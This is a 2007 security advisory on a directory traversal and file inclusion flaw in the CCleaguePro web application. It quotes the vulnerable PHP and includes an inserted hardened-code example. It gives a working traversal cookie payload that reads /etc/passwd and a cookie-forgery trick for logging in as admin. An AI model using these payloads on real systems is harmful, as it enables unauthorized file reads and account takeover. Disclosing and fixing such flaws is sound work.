SECURITYVULNS:DOC:16405
Mar 19, 2007

CCleaguePro_V1.0.1RC1 Directory Traversal Vulnerability

CCleaguePro
Version: 1.0.1 RC1
Website URL: http://www.castillocentral.com/

Discovered by Snake
[Unkn0wn Security Researcher]
The original article can be found at: http://unkn0wn.awardspace.com/

[XIII Security ResearcherZ]
Gr33tZ t0 :l0pht.blackhat,Kouros,Sasan, All Iranian Hackerz

Vulnerable code is in index.php & some other pages,
at lines 27-35:

---------------cut here --------------->

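if($_COOKIE["language"]) {
    // Cookie value is taken as-is, with no validation
    $llang = $_COOKIE["language"];
}
else
{
    $l_array = explode("-",$lang_array[0]);
    $llang = $l_array[0];

    setcookie("language",$llang,time()+1209600,"","","");
}

// $llang (client-controlled via the cookie) goes straight into the include path
include("lang/".$llang.".php");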
---------------cut here ---------------<
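
A hardened form of the include above, as an added example (not CCleaguePro's code or the advisory author's): the cookie is accepted only if it matches a language-code pattern and names a file that actually exists in lang/. The resolve_language() helper, the temp-directory layout, the "en" fallback and the sample cookie values are assumptions constructed for illustration.

```php
<?php
// Added example: hardened replacement for the cookie-driven include shown above.
// Assumptions (not from CCleaguePro): the resolve_language() helper name, a lang/
// directory of "<code>.php" files, and "en" as the fallback language.

function resolve_language(?string $cookieValue, string $langDir, string $default = 'en'): string
{
    // Build the allowlist from the language files that actually exist.
    $allowed = [];
    foreach (glob($langDir . '/*.php') ?: [] as $file) {
        $allowed[] = basename($file, '.php');
    }

    // Accept the cookie only if it looks like a language code AND is allowlisted.
    // Path separators, dots and NUL bytes can never reach the include this way.
    if ($cookieValue !== null
        && preg_match('/\A[a-z]{2}(?:-[a-z]{2})?\z/i', $cookieValue) === 1
        && in_array($cookieValue, $allowed, true)) {
        return $cookieValue;
    }
    return $default;
}

// Self-contained demo using a constructed lang/ directory under the temp dir.
$langDir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
mkdir($langDir);
file_put_contents("$langDir/en.php", '<?php $greeting = "Hello";');
file_put_contents("$langDir/fr.php", '<?php $greeting = "Bonjour";');

// Constructed cookie values: two legitimate, the rest malformed or hostile.
$samples = ['fr', 'en', '../../etc/passwd', "en\0", 'de', '', null];
foreach ($samples as $value) {
    $llang = resolve_language($value, $langDir);
    include $langDir . '/' . $llang . '.php';   // only ever an allowlisted file
    printf("%-24s -> %s (%s)\n", var_export($value, true), $llang, $greeting);
}

// Clean up the constructed files.
array_map('unlink', glob($langDir . '/*.php'));
rmdir($langDir);
```

Every value other than 'fr' and 'en' falls back to the default, so the include path is always one of the files enumerated from lang/.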

==============================================================
Ex:
Open the cookies and find the portal's cookies, then change this in the first line (use Opera for changing; it is too easy with Opera: Tools ==> Advanced ==> Cookies):
---------------cut here --------------->
language

en
to
language

…/…/…/…/…/…/…/…/…/etc/passwd%00
---------------cut here ---------------<

If you found the admin's email for login, you can change the cookies to something like this:

---------------cut here --------------->
u

snake%40lolo.com

type

admin
---------------cut here ---------------<

and log in as admin!